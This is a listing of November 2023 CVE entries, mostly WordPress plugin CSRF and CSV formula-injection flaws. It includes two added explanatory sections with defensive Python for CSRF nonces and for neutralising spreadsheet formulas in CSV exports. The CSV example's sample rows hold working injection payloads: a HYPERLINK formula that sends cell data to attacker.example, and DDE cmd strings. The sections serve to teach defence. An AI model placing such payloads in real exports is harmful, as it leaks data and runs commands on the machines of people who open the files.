2023-11-10 CVE-2023-31077 Myrecorp Cross-Site Request Forgery (CSRF) vulnerability in Myrecorp Export WP Page to Static Html/Css

Cross-Site Request Forgery (CSRF) vulnerability in ReCorp Export WP Page to Static HTML/CSS plugin <= 2.1.9 versions.

8.8
2023-11-10 CVE-2023-31078 Browserupdate Cross-Site Request Forgery (CSRF) vulnerability in Browserupdate WP Browserupdate

Cross-Site Request Forgery (CSRF) vulnerability in Marco Steinbrecher WP BrowserUpdate plugin <= 4.4.1 versions.

8.8
2023-11-10 CVE-2023-6069 Froxlor Link Following vulnerability in Froxlor

Improper Link Resolution Before File Access in GitHub repository froxlor/froxlor prior to 2.1.0.

8.8
2023-11-09 CVE-2023-31086 Ibenic Cross-Site Request Forgery (CSRF) vulnerability in Ibenic Simple Giveaways

Cross-Site Request Forgery (CSRF) vulnerability in Igor Benic Simple Giveaways – Grow your business, email lists and traffic with contests plugin <= 2.46.0 versions.

8.8
2023-11-09 CVE-2023-31088 Floating Action Button Project Cross-Site Request Forgery (CSRF) vulnerability in Floating Action Button Project Floating Action Button

Cross-Site Request Forgery (CSRF) vulnerability in Faraz Quazi Floating Action Button plugin <= 1.2.1 versions.

8.8
2023-11-09 CVE-2023-31093 Chronosly Events Calendar Project Cross-Site Request Forgery (CSRF) vulnerability in Chronosly-Events-Calendar Project Chronosly-Events-Calendar

Cross-Site Request Forgery (CSRF) vulnerability in Chronosly Chronosly Events Calendar plugin <= 2.6.2 versions.

8.8
2023-11-09 CVE-2023-31235 Xnau Cross-Site Request Forgery (CSRF) vulnerability in Xnau Participants Database

Cross-Site Request Forgery (CSRF) vulnerability in Roland Barker, xnau webdesign Participants Database plugin <= 2.4.9 versions.

8.8
2023-11-09 CVE-2023-32092 Peepso Cross-Site Request Forgery (CSRF) vulnerability in Peepso

Cross-Site Request Forgery (CSRF) vulnerability in PeepSo Community by PeepSo – Social Network, Membership, Registration, User Profiles plugin <= 6.0.9.0 versions.

8.8
2023-11-09 CVE-2023-32093 Tpginc Cross-Site Request Forgery (CSRF) vulnerability in Tpginc TPG Redirect

Cross-Site Request Forgery (CSRF) vulnerability in Criss Swaim TPG Redirect plugin <= 1.0.7 versions.

8.8
2023-11-09 CVE-2023-32125 Danielpowney Cross-Site Request Forgery (CSRF) vulnerability in Danielpowney Multi Rating

Cross-Site Request Forgery (CSRF) vulnerability in Daniel Powney Multi Rating plugin <= 5.0.6 versions.

8.8
2023-11-09 CVE-2023-32500 Xtemos Cross-Site Request Forgery (CSRF) vulnerability in Xtemos Woodmart

Cross-Site Request Forgery (CSRF) vulnerability in xtemos WoodMart - Multipurpose WooCommerce Theme <= 7.1.1 versions.

8.8
2023-11-09 CVE-2023-32501 Vikwp Cross-Site Request Forgery (CSRF) vulnerability in Vikwp Vikbooking Hotel Booking Engine & PMS

Cross-Site Request Forgery (CSRF) vulnerability in E4J s.r.l.

8.8
2023-11-09 CVE-2023-32502 Cyberwire Cross-Site Request Forgery (CSRF) vulnerability in Cyberwire PRO Mime Types

Cross-Site Request Forgery (CSRF) vulnerability in Sybre Waaijer Pro Mime Types – Manage file media types plugin <= 1.0.7 versions.

8.8
2023-11-09 CVE-2023-32512 Shortpixel Cross-Site Request Forgery (CSRF) vulnerability in Shortpixel Adaptive Images

Cross-Site Request Forgery (CSRF) vulnerability in ShortPixel ShortPixel Adaptive Images – WebP, AVIF, CDN, Image Optimization plugin <= 3.7.1 versions.

8.8
2023-11-09 CVE-2023-32579 Designsandcode Cross-Site Request Forgery (CSRF) vulnerability in Designsandcode Forget About Shortcode Buttons

Cross-Site Request Forgery (CSRF) vulnerability in Designs & Code Forget About Shortcode Buttons plugin <= 2.1.2 versions.

8.8
2023-11-09 CVE-2023-32587 Wpreactions Cross-Site Request Forgery (CSRF) vulnerability in Wpreactions WP Reactions Lite

Cross-Site Request Forgery (CSRF) vulnerability in WP Reactions, LLC WP Reactions Lite plugin <= 1.3.8 versions.

8.8
2023-11-09 CVE-2023-32592 Fast Search Powered BY Solr Project Cross-Site Request Forgery (CSRF) vulnerability in Fast-Search-Powered-By-Solr Project Fast-Search-Powered-By-Solr

Cross-Site Request Forgery (CSRF) vulnerability in Palasthotel by Edward Bock, Katharina Rompf Sunny Search plugin <= 1.0.2 versions.

8.8
2023-11-09 CVE-2023-32594 E2B Cross-Site Request Forgery (CSRF) vulnerability in E2B Hyphenator

Cross-Site Request Forgery (CSRF) vulnerability in Benedict B., Maciej Gryniuk Hyphenator plugin <= 5.1.5 versions.

8.8
2023-11-09 CVE-2023-32602 Lokalyze Cross-Site Request Forgery (CSRF) vulnerability in Lokalyze Call ME NOW

Cross-Site Request Forgery (CSRF) vulnerability in LOKALYZE CALL ME NOW plugin <= 3.0 versions.

8.8
2023-11-09 CVE-2023-32739 Hamidrezasepehr Cross-Site Request Forgery (CSRF) vulnerability in Hamidrezasepehr Custom Cursors

Cross-Site Request Forgery (CSRF) vulnerability in Web_Trendy WP Custom Cursors | WordPress Cursor Plugin plugin < 3.2 versions.

8.8
2023-11-09 CVE-2023-32744 Woocommerce Cross-Site Request Forgery (CSRF) vulnerability in Woocommerce Product Recommendations

Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce Product Recommendations plugin <= 2.3.0 versions.

8.8
2023-11-09 CVE-2023-32745 Woocommerce Cross-Site Request Forgery (CSRF) vulnerability in Woocommerce Automatewoo

Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce AutomateWoo plugin <= 5.7.1 versions.

8.8
2023-11-09 CVE-2023-32794 Woocommerce Cross-Site Request Forgery (CSRF) vulnerability in Woocommerce Product Addons

Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce Product Add-Ons plugin <= 6.1.3 versions.

8.8
2023-11-09 CVE-2023-34024 Guillemantdavid Cross-Site Request Forgery (CSRF) vulnerability in Guillemantdavid Full Auto Tags Manager

Cross-Site Request Forgery (CSRF) vulnerability in Guillemant David WP Full Auto Tags Manager plugin <= 2.2 versions.

8.8
2023-11-09 CVE-2023-34025 LWS Cross-Site Request Forgery (CSRF) vulnerability in LWS Hide Login

Cross-Site Request Forgery (CSRF) vulnerability in LWS LWS Hide Login plugin <= 2.1.6 versions.

8.8
2023-11-09 CVE-2023-34031 Casier Cross-Site Request Forgery (CSRF) vulnerability in Casier Bbpress Toolkit

Cross-Site Request Forgery (CSRF) vulnerability in Pascal Casier bbPress Toolkit plugin <= 1.0.12 versions.

8.8
2023-11-09 CVE-2023-34033 Malinky Cross-Site Request Forgery (CSRF) vulnerability in Malinky Malinky-Ajax-Pagination

Cross-Site Request Forgery (CSRF) vulnerability in Malinky Ajax Pagination and Infinite Scroll plugin <= 2.0.1 versions.

8.8
2023-11-09 CVE-2023-34169 Sakura Cross-Site Request Forgery (CSRF) vulnerability in Sakura TS Webfonts for Sakura

Cross-Site Request Forgery (CSRF) vulnerability in SAKURA Internet Inc.

8.8
2023-11-09 CVE-2023-34171 Esiteq Cross-Site Request Forgery (CSRF) vulnerability in Esiteq WP Report Post 2.1.2

Cross-Site Request Forgery (CSRF) vulnerability in Alex Raven WP Report Post plugin <= 2.1.2 versions.

8.8
2023-11-09 CVE-2023-34177 Kenthhagstrom Cross-Site Request Forgery (CSRF) vulnerability in Kenthhagstrom Wp-Cachecom

Cross-Site Request Forgery (CSRF) vulnerability in Kenth Hagström WP-Cache.com plugin <= 1.1.1 versions.

8.8
2023-11-09 CVE-2023-5539 Moodle
Fedoraproject
Code Injection vulnerability in multiple products

A remote code execution risk was identified in the Lesson activity.

8.8
2023-11-09 CVE-2023-5540 Moodle
Fedoraproject
Code Injection vulnerability in multiple products

A remote code execution risk was identified in the IMSCP activity.

8.8
2023-11-09 CVE-2023-34178 Groundhogg Cross-Site Request Forgery (CSRF) vulnerability in Groundhogg

Cross-Site Request Forgery (CSRF) vulnerability in Groundhogg Inc.

8.8
2023-11-09 CVE-2023-34181 WP Cirrus Project Cross-Site Request Forgery (CSRF) vulnerability in Wp-Cirrus Project Wp-Cirrus 0.6.11

Cross-Site Request Forgery (CSRF) vulnerability in WP-Cirrus plugin <= 0.6.11 versions.

8.8
2023-11-09 CVE-2023-34182 Shawfactor Cross-Site Request Forgery (CSRF) vulnerability in Shawfactor Lh-Password-Changer

Cross-Site Request Forgery (CSRF) vulnerability in Peter Shaw LH Password Changer plugin <= 1.55 versions.

8.8
2023-11-09 CVE-2023-34371 Spamreferrerblock Project Cross-Site Request Forgery (CSRF) vulnerability in Spamreferrerblock Project Spamreferrerblock 2.22

Cross-Site Request Forgery (CSRF) vulnerability in Didier Sampaolo SpamReferrerBlock plugin <= 2.22 versions.

8.8
2023-11-09 CVE-2023-47237 Auto Publish FOR Google MY Business Project Cross-Site Request Forgery (CSRF) vulnerability in Auto Publish for Google MY Business Project Auto Publish for Google MY Business

Cross-Site Request Forgery (CSRF) vulnerability in Martin Gibson Auto Publish for Google My Business plugin <= 3.7 versions.

8.8
2023-11-09 CVE-2023-47238 Webberzone Cross-Site Request Forgery (CSRF) vulnerability in Webberzone TOP 10

Cross-Site Request Forgery (CSRF) vulnerability in WebberZone Top 10 – WordPress Popular posts by WebberZone plugin <= 3.3.2 versions.

8.8
2023-11-09 CVE-2023-25975 Etsy Shop Project Cross-Site Request Forgery (CSRF) vulnerability in Etsy Shop Project Etsy Shop

Cross-Site Request Forgery (CSRF) vulnerability in Frédéric Sheedy Etsy Shop plugin <= 3.0.3 versions.

8.8
2023-11-09 CVE-2023-31087 Joomsky Cross-Site Request Forgery (CSRF) vulnerability in Joomsky JS JOB Manager

Cross-Site Request Forgery (CSRF) vulnerability in JoomSky JS Job Manager plugin <= 2.0.0 versions.

8.8
2023-11-09 CVE-2023-34002 Wpinventory Cross-Site Request Forgery (CSRF) vulnerability in Wpinventory WP Inventory Manager

Cross-Site Request Forgery (CSRF) vulnerability in WP Inventory Manager plugin <= 2.1.0.13 versions.

8.8
2023-11-09 CVE-2023-34386 Wpclever Cross-Site Request Forgery (CSRF) vulnerability in Wpclever WPC Smart Wishlist for Woocommerce

Cross-Site Request Forgery (CSRF) vulnerability in WPClever WPC Smart Wishlist for WooCommerce plugin <= 4.7.1 versions.

8.8
2023-11-09 CVE-2023-46614 Matbao Cross-Site Request Forgery (CSRF) vulnerability in Matbao WP Helper Premium

Cross-Site Request Forgery (CSRF) vulnerability in Mat Bao Corp WP Helper Premium plugin <= 4.5.1 versions.

8.8
2023-11-09 CVE-2023-25994 Publish TO Schedule Project Cross-Site Request Forgery (CSRF) vulnerability in Publish to Schedule Project Publish to Schedule

Cross-Site Request Forgery (CSRF) vulnerability in Alex Benfica Publish to Schedule plugin <= 4.4.2 versions.

8.8
2023-11-09 CVE-2023-40054 Solarwinds Path Traversal vulnerability in Solarwinds Network Configuration Manager

The Network Configuration Manager was susceptible to a Directory Traversal Remote Code Execution Vulnerability.

8.8
2023-11-09 CVE-2023-40055 Solarwinds Path Traversal vulnerability in Solarwinds Network Configuration Manager

The Network Configuration Manager was susceptible to a Directory Traversal Remote Code Execution Vulnerability.

8.8
2023-11-09 CVE-2023-43791 Humansignal Information Exposure vulnerability in Humansignal Label Studio

Label Studio is a multi-type data labeling and annotation tool with standardized output format.

8.8
2023-11-09 CVE-2021-43609 Spiceworks SQL Injection vulnerability in Spiceworks Help Desk Server

An issue was discovered in Spiceworks Help Desk Server before 1.3.3.

8.8
2023-11-08 CVE-2023-5996 Google
Debian
Fedoraproject
Use After Free vulnerability in multiple products

Use after free in WebAudio in Google Chrome prior to 119.0.6045.123 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

8.8
2023-11-08 CVE-2023-47107 THM Weak Password Recovery Mechanism for Forgotten Password vulnerability in THM Pilos

PILOS is an open source front-end for BigBlueButton servers with a built-in load balancer.

8.8
2023-11-08 CVE-2023-39913 Apache Deserialization of Untrusted Data vulnerability in Apache Uimaj

Deserialization of Untrusted Data, Improper Input Validation vulnerability in Apache UIMA Java SDK. This issue affects Apache UIMA Java SDK: before 3.5.0. Users are recommended to upgrade to version 3.5.0, which fixes the issue. There are several locations in the code where serialized Java objects are deserialized without verifying the data.

8.8
2023-11-07 CVE-2023-45380 Silbersaiten Authorization Bypass Through User-Controlled Key vulnerability in Silbersaiten Order Duplicator 1.1.7

In the module "Order Duplicator - Clone and Delete Existing Order" (orderduplicate) in version <= 1.1.7 from Silbersaiten for PrestaShop, a guest can download personal information without restriction.

8.8
2023-11-07 CVE-2023-46243 Xwiki Code Injection vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

8.8
2023-11-07 CVE-2023-46242 Xwiki Cross-Site Request Forgery (CSRF) vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

8.8
2023-11-07 CVE-2023-46244 Xwiki Incorrect Authorization vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

8.8
2023-11-07 CVE-2022-38702 Kigurumi Improper Neutralization of Formula Elements in a CSV File vulnerability in Kigurumi CSV Exporter

Improper Neutralization of Formula Elements in a CSV File vulnerability in Nakashima Masahiro WP CSV Exporter. This issue affects WP CSV Exporter: from n/a through 2.0.

8.8
2023-11-07 CVE-2022-41616 Kaushikkalathiya Improper Neutralization of Formula Elements in a CSV File vulnerability in Kaushikkalathiya Export Users Data

Improper Neutralization of Formula Elements in a CSV File vulnerability in Kaushik Kalathiya Export Users Data CSV. This issue affects Export Users Data CSV: from n/a through 2.1.

8.8
2023-11-07 CVE-2022-42882 Shambix Improper Neutralization of Formula Elements in a CSV File vulnerability in Shambix Simple Csv/Xls Exporter

Improper Neutralization of Formula Elements in a CSV File vulnerability in Shambix Simple CSV/XLS Exporter. This issue affects Simple CSV/XLS Exporter: from n/a through 1.5.8.

8.8
2023-11-07 CVE-2022-44738 Patrickrobrecht Improper Neutralization of Formula Elements in a CSV File vulnerability in Patrickrobrecht Posts and Users Stats

Improper Neutralization of Formula Elements in a CSV File vulnerability in Patrick Robrecht Posts and Users Stats. This issue affects Posts and Users Stats: from n/a through 1.1.3.

8.8
2023-11-07 CVE-2022-47181 Wpexperts Cross-Site Request Forgery (CSRF) vulnerability in Wpexperts Email Templates Customizer and Designer

Cross-Site Request Forgery (CSRF) vulnerability in wpexpertsio Email Templates Customizer and Designer for WordPress and WooCommerce (email-templates) allows Cross Site Request Forgery. This issue affects Email Templates Customizer and Designer for WordPress and WooCommerce: from n/a through 1.4.2.

8.8
2023-11-07 CVE-2023-41798 Wpwax Improper Neutralization of Formula Elements in a CSV File vulnerability in Wpwax Directorist

Improper Neutralization of Formula Elements in a CSV File vulnerability in wpWax Directorist – WordPress Business Directory Plugin with Classified Ads Listings. This issue affects Directorist – WordPress Business Directory Plugin with Classified Ads Listings: from n/a through 7.7.1.

8.8
2023-11-07 CVE-2023-46730 Group Office Server-Side Request Forgery (SSRF) vulnerability in Group-Office Group Office

Group-Office is an enterprise CRM and groupware tool.

8.8
2023-11-07 CVE-2022-45348 Anmari Improper Neutralization of Formula Elements in a CSV File vulnerability in Anmari AMR Users

Improper Neutralization of Formula Elements in a CSV File vulnerability in anmari amr users. This issue affects amr users: from n/a through 4.59.4.

8.8
2023-11-07 CVE-2022-46804 Narolainfotech Improper Neutralization of Formula Elements in a CSV File vulnerability in Narolainfotech Export Users Data Distinct

Improper Neutralization of Formula Elements in a CSV File vulnerability in Narola Infotech Solutions LLP Export Users Data Distinct. This issue affects Export Users Data Distinct: from n/a through 1.3.

8.8
2023-11-07 CVE-2022-46821 Jackmail Improper Neutralization of Formula Elements in a CSV File vulnerability in Jackmail

Improper Neutralization of Formula Elements in a CSV File vulnerability in Jackmail & Sarbacane Emails & Newsletters with Jackmail. This issue affects Emails & Newsletters with Jackmail: from n/a through 1.2.22.

8.8
2023-11-07 CVE-2023-25983 Liquidweb Improper Neutralization of Formula Elements in a CSV File vulnerability in Liquidweb KB Support

Improper Neutralization of Formula Elements in a CSV File vulnerability in WPOmnia KB Support. This issue affects KB Support: from n/a through 1.5.84.

8.8
2023-11-07 CVE-2023-36527 Bestwebsoft Improper Neutralization of Formula Elements in a CSV File vulnerability in Bestwebsoft Post to CSV

Improper Neutralization of Formula Elements in a CSV File vulnerability in BestWebSoft Post to CSV by BestWebSoft. This issue affects Post to CSV by BestWebSoft: from n/a through 1.4.0.

8.8
2023-11-07 CVE-2023-42659 Progress Unrestricted Upload of File with Dangerous Type vulnerability in Progress WS FTP Server

In WS_FTP Server versions prior to 8.7.6 and 8.8.4, an unrestricted file upload flaw has been identified.

8.8
2023-11-07 CVE-2022-45350 Simple History Improper Neutralization of Formula Elements in a CSV File vulnerability in Simple-History Simple History

Improper Neutralization of Formula Elements in a CSV File vulnerability in Pär Thernström Simple History – user activity log, audit tool. This issue affects Simple History – user activity log, audit tool: from n/a through 3.3.1.

8.8
2023-11-07 CVE-2022-47442 Ayecode Improper Neutralization of Formula Elements in a CSV File vulnerability in Ayecode Userswp

Improper Neutralization of Formula Elements in a CSV File vulnerability in AyeCode Ltd UsersWP. This issue affects UsersWP: from n/a through 1.2.3.9.

8.8
2023-11-07 CVE-2023-33480 Remoteclinic Unrestricted Upload of File with Dangerous Type vulnerability in Remoteclinic Remote Clinic 2.0

RemoteClinic 2.0 contains a critical vulnerability chain that can be exploited by a remote attacker with low-privileged user credentials to create admin users, escalate privileges, and execute arbitrary code on the target system via a PHP shell.

8.8
2023-11-07 CVE-2023-28572 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption in WLAN HOST while processing the WLAN scan descriptor list.

8.8
2023-11-06 CVE-2023-47004 Redislabs Out-of-bounds Write vulnerability in Redislabs Redisgraph

Buffer Overflow vulnerability in Redis RedisGraph v.2.x through v.2.12.8 and fixed in v.2.12.9 allows an attacker to execute arbitrary code via the code logic after valid authentication.

8.8
2023-11-06 CVE-2023-44398 Exiv2 Out-of-bounds Write vulnerability in Exiv2 0.28.0

Exiv2 is a C++ library and a command-line utility to read, write, delete and modify Exif, IPTC, XMP and ICC image metadata.

8.8
2023-11-06 CVE-2023-46776 Josie Cross-Site Request Forgery (CSRF) vulnerability in Josie Auto Excerpt Everywhere

Cross-Site Request Forgery (CSRF) vulnerability in Serena Villa Auto Excerpt everywhere plugin <= 1.5 versions.

8.8
2023-11-06 CVE-2023-46777 Featherplugins Cross-Site Request Forgery (CSRF) vulnerability in Featherplugins Custom Login Page | Temporary Users | Rebrand Login | Login Captcha

Cross-Site Request Forgery (CSRF) vulnerability in Custom Login Page | Temporary Users | Rebrand Login | Login Captcha plugin <= 1.1.3 versions.

8.8
2023-11-06 CVE-2023-46778 Thefreewindows Cross-Site Request Forgery (CSRF) vulnerability in Thefreewindows Auto Limit Posts Reloaded

Cross-Site Request Forgery (CSRF) vulnerability in TheFreeWindows Auto Limit Posts Reloaded plugin <= 2.5 versions.

8.8
2023-11-06 CVE-2023-46779 Easyrecipe Project Cross-Site Request Forgery (CSRF) vulnerability in Easyrecipe Project Easyrecipe

Cross-Site Request Forgery (CSRF) vulnerability in EasyRecipe plugin <= 3.5.3251 versions.

8.8
2023-11-06 CVE-2023-46780 Altersoftware Cross-Site Request Forgery (CSRF) vulnerability in Altersoftware Alter

Cross-Site Request Forgery (CSRF) vulnerability in Alter plugin <= 1.0 versions.

8.8
2023-11-06 CVE-2023-46781 Rolandmurg Cross-Site Request Forgery (CSRF) vulnerability in Rolandmurg Current Menu Item for Custom Post Types

Cross-Site Request Forgery (CSRF) vulnerability in Roland Murg Current Menu Item for Custom Post Types plugin <= 1.5 versions.

8.8
2023-11-06 CVE-2023-47186 Kadencewp Cross-Site Request Forgery (CSRF) vulnerability in Kadencewp Kadence Woocommerce Email Designer

Cross-Site Request Forgery (CSRF) vulnerability in Kadence WP Kadence WooCommerce Email Designer plugin <= 1.5.11 versions.

8.8
2023-11-06 CVE-2023-5823 Themekraft Cross-Site Request Forgery (CSRF) vulnerability in Themekraft TK Google Fonts Gdpr Compliant

Cross-Site Request Forgery (CSRF) vulnerability in ThemeKraft TK Google Fonts GDPR Compliant plugin <= 2.2.11 versions.

8.8
2023-11-06 CVE-2023-46775 Zixn Cross-Site Request Forgery (CSRF) vulnerability in Zixn Original Texts Yandex Webmaster

Cross-Site Request Forgery (CSRF) vulnerability in Djo Original texts Yandex WebMaster plugin <= 1.18 versions.

8.8
2023-11-06 CVE-2023-4996 Netskope Improper Preservation of Permissions vulnerability in Netskope

Netskope was made aware of a security vulnerability in its NSClient product for version 100 & prior where a malicious non-admin user can disable the Netskope client by using a specially-crafted package.

8.8
2023-11-06 CVE-2023-46084 Bplugins SQL Injection vulnerability in Bplugins Icons Font Loader 1.0/1.1.2

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in bPlugins LLC Icons Font Loader allows SQL Injection. This issue affects Icons Font Loader: from n/a through 1.1.2.

8.8
2023-11-06 CVE-2023-47182 Nazmulhossainnihal Cross-Site Request Forgery (CSRF) vulnerability in Nazmulhossainnihal Login Screen Manager

Cross-Site Request Forgery (CSRF) leading to a Stored Cross-Site Scripting (XSS) vulnerability in Nazmul Hossain Nihal Login Screen Manager plugin <= 3.5.2 versions.

8.8
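The WordPress CSRF entries above share one root cause: a settings or action handler that trusts the logged-in session cookie alone, so a form auto-submitted from an attacker's page (which the browser sends with the victim's cookie) is indistinguishable from a legitimate admin request. The fix in a WordPress plugin is to require an action-bound nonce (wp_nonce_field() / check_admin_referer() or wp_verify_nonce()) together with a capability check (current_user_can()). The example below is added here to illustrate that mechanism in framework-agnostic Python; it is not code from any of the listed plugins or from WordPress, and the server secret, session identifiers, request shape and the "save_settings" action name are assumptions for the demonstration.

```python
import hashlib
import hmac
import time

# Assumption: an example-only server secret. A real deployment loads this from
# configuration (WordPress derives nonces from the salts in wp-config.php).
SERVER_SECRET = b"example-only-secret-do-not-use"
NONCE_LIFETIME = 12 * 60 * 60  # seconds; a nonce is valid for one or two half-windows


def _tick(now):
    """Half-lifetime window counter, so nonces expire without server-side state."""
    return int(now // (NONCE_LIFETIME // 2))


def _digest(tick, action, session_id):
    msg = "{}|{}|{}".format(tick, action, session_id).encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()[:16]


def make_nonce(session_id, action, now=None):
    """Nonce bound to the caller's session AND to one named action."""
    now = time.time() if now is None else now
    return _digest(_tick(now), action, session_id)


def verify_nonce(nonce, session_id, action, now=None):
    """Constant-time check; accepts the current and the previous window."""
    if not isinstance(nonce, str):
        return False
    now = time.time() if now is None else now
    t = _tick(now)
    for tick in (t, t - 1):
        expected = _digest(tick, action, session_id)
        if hmac.compare_digest(nonce.encode(), expected.encode()):
            return True
    return False


def vulnerable_save_settings(request, settings):
    """The pattern behind the CSRF entries: only 'is someone logged in?' is
    checked. A cross-site form post carries the victim's cookie, so a forged
    request updates the settings exactly like a legitimate one."""
    if request["session_id"] is None:
        return False
    settings.update(request["form"])
    return True


def hardened_save_settings(request, settings, now=None):
    """Capability check plus an action-bound nonce, which is what
    current_user_can() and check_admin_referer() give a WordPress handler."""
    sid = request["session_id"]
    if sid is None or request["role"] != "administrator":
        return False
    form = request["form"]
    if not verify_nonce(form.get("_nonce", ""), sid, "save_settings", now):
        return False
    settings.update({k: v for k, v in form.items() if k != "_nonce"})
    return True


if __name__ == "__main__":
    # Constructed forged request: the attacker's page cannot read the nonce,
    # so it can only send the fields it wants changed.
    forged = {"session_id": "victim-cookie", "role": "administrator",
              "form": {"site_url": "https://attacker.example"}}
    print("vulnerable handler accepted forged request:", vulnerable_save_settings(forged, {}))
    print("hardened handler accepted forged request:", hardened_save_settings(forged, {}))
```

The nonce is keyed on the session as well as the action, so a token an attacker obtains for their own session does not validate for the victim's, and a token for one action (for example a harmless "preview") cannot be replayed against a destructive one. The capability check is still needed separately: a nonce proves the request came from a page the server rendered for this user, not that the user is allowed to perform the action.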
2023-11-08 CVE-2023-47109 Prestashop Unspecified vulnerability in Prestashop Customer Reassurance Block

PrestaShop blockreassurance adds an information block aimed at offering helpful information to reassure customers that the store is trustworthy.

8.1
2023-11-07 CVE-2023-43885 Tenda Missing Authorization vulnerability in Tenda RX9 PRO Firmware 22.03.02.10

Missing error handling in the HTTP server component of Tenda RX9 Pro Firmware V22.03.02.20 allows authenticated attackers to arbitrarily lock the device.

8.1
2023-11-06 CVE-2023-5355 Getawesomesupport Path Traversal vulnerability in Getawesomesupport Awesome Support

The Awesome Support WordPress plugin before 6.1.5 does not sanitize file paths when deleting temporary attachment files, allowing a ticket submitter to delete arbitrary files on the server.

8.1
2023-11-12 CVE-2023-28134 Checkpoint Incorrect Permission Assignment for Critical Resource vulnerability in Checkpoint Endpoint Security E84/E85/E86

Local attacker can escalate privileges on affected installations of Check Point Harmony Endpoint/ZoneAlarm Extreme Security.

7.8
2023-11-10 CVE-2023-47611 Telit Unspecified vulnerability in Telit products

A CWE-269: Improper Privilege Management vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to elevate privileges to "manufacturer" level on the targeted system.

7.8
2023-11-09 CVE-2023-47489 Combodo Unspecified vulnerability in Combodo Itop 3.1.0211973

CSV injection in export as csv in Combodo iTop v.3.1.0-2-11973 allows a local attacker to execute arbitrary code via a crafted script to the export-v2.php and ajax.render.php components.

7.8
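The "Improper Neutralization of Formula Elements in a CSV File" entries above (the WordPress export plugins) and the iTop export-as-CSV entry are all the same bug: user-controlled text is written straight into a CSV that an administrator later opens in a spreadsheet, where a cell beginning with `=`, `+`, `-`, `@`, tab or carriage return is evaluated as a formula (hyperlinks that exfiltrate other cells, DDE-style `=cmd|...` payloads, and so on). The Python below is an added example, not code from any of the listed products; it shows an exporter that defuses such cells with a leading apostrophe while leaving plain numbers untouched, plus an audit helper that scans an existing CSV for cells that would still be evaluated. The sample rows are constructed for the demonstration.

```python
import csv
import io
import re

# Characters that make a spreadsheet treat a cell as a formula (the OWASP list).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
# A bare number such as "-5" or "+3.2e1" is a value, not a formula; don't mangle it.
NUMBER_RE = re.compile(r"[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def is_formula_cell(text):
    """True when the cell would be evaluated as a formula on import.
    Leading spaces are skipped because importers ignore them too."""
    stripped = text.lstrip(" ")
    if stripped[:1] not in FORMULA_TRIGGERS:
        return False
    return NUMBER_RE.fullmatch(stripped) is None


def neutralize_cell(value):
    """Render one cell so it cannot be evaluated as a formula."""
    if value is None:
        return ""
    text = str(value)
    if is_formula_cell(text):
        # A leading apostrophe forces text mode in Excel, LibreOffice and Sheets.
        return "'" + text
    return text


def export_csv(rows, fieldnames):
    """Write rows as CSV with every cell quoted and formula triggers defused.
    QUOTE_ALL also takes care of separators and embedded quotes."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(fieldnames)
    for row in rows:
        writer.writerow([neutralize_cell(row.get(name)) for name in fieldnames])
    return buf.getvalue()


def formula_cells(csv_text):
    """Audit helper: return every cell in csv_text that still looks like a formula."""
    reader = csv.reader(io.StringIO(csv_text))
    return [cell for row in reader for cell in row if is_formula_cell(cell)]


# Constructed sample export of user-supplied profile fields (not taken from any
# of the plugins above); the payloads are the classic CSV-injection shapes.
SAMPLE_ROWS = [
    {"display_name": "Alice Example", "age": 34, "note": "regular user"},
    {"display_name": '=HYPERLINK("https://attacker.example/?c="&A1,"click")', "age": 29, "note": ""},
    {"display_name": "@SUM(1+1)*cmd|' /C calc'!A0", "age": -1, "note": "  -2+3+cmd|' /C calc'!A0"},
    {"display_name": 'Bob, "the" builder', "age": None, "note": "\tplus tab"},
]

if __name__ == "__main__":
    out = export_csv(SAMPLE_ROWS, ["display_name", "age", "note"])
    print(out)
    print("cells still evaluable as formulas:", formula_cells(out))
```

Two practical caveats: the apostrophe is the portable defence, but some importers display it, so an export intended for machine consumption (not a spreadsheet) may prefer to reject such values at input time instead; and the audit helper is worth running over exports produced by third-party plugins, since a plugin that escapes `=` but forgets `@`, `+`, `-`, tab and CR is still injectable.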
2023-11-08 CVE-2023-4632 Lenovo Uncontrolled Search Path Element vulnerability in Lenovo System Update

An uncontrolled search path vulnerability was reported in Lenovo System Update that could allow an attacker with local access to execute code with elevated privileges.

7.8
2023-11-08 CVE-2023-4706 Lenovo Unspecified vulnerability in Lenovo Preload Directory

A privilege escalation vulnerability was reported in Lenovo preloaded devices deployed using Microsoft AutoPilot under a standard user account due to incorrect default privileges.

7.8
2023-11-07 CVE-2023-42361 Midori Global Server-Side Request Forgery (SSRF) vulnerability in Midori-Global Better PDF Exporter 10.0.0

Local File Inclusion vulnerability in Midori-global Better PDF Exporter for Jira Server and Jira Data Center v.10.3.0 and before allows an attacker to view arbitrary files and cause other impacts via use of a crafted image during PDF export.

7.8
2023-11-07 CVE-2023-3889 ARM Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in ARM Valhall GPU Kernel Driver

A local non-privileged user can make improper GPU memory processing operations.

7.8
2023-11-07 CVE-2023-4295 ARM Use After Free vulnerability in ARM Mali GPU Kernel Driver and Valhall GPU Kernel Driver

A local non-privileged user can make improper GPU memory processing operations to gain access to already freed memory.

7.8
2023-11-07 CVE-2023-5179 Opendesign Out-of-bounds Read vulnerability in Opendesign Drawings SDK

An issue was discovered in Open Design Alliance Drawings SDK before 2024.10.

7.8
2023-11-07 CVE-2023-30739 Samsung Unspecified vulnerability in Samsung Android 11.0/12.0

Arbitrary File Descriptor Write vulnerability in libsec-ril prior to SMR Nov-2023 Release 1 allows a local attacker to execute arbitrary code.

7.8
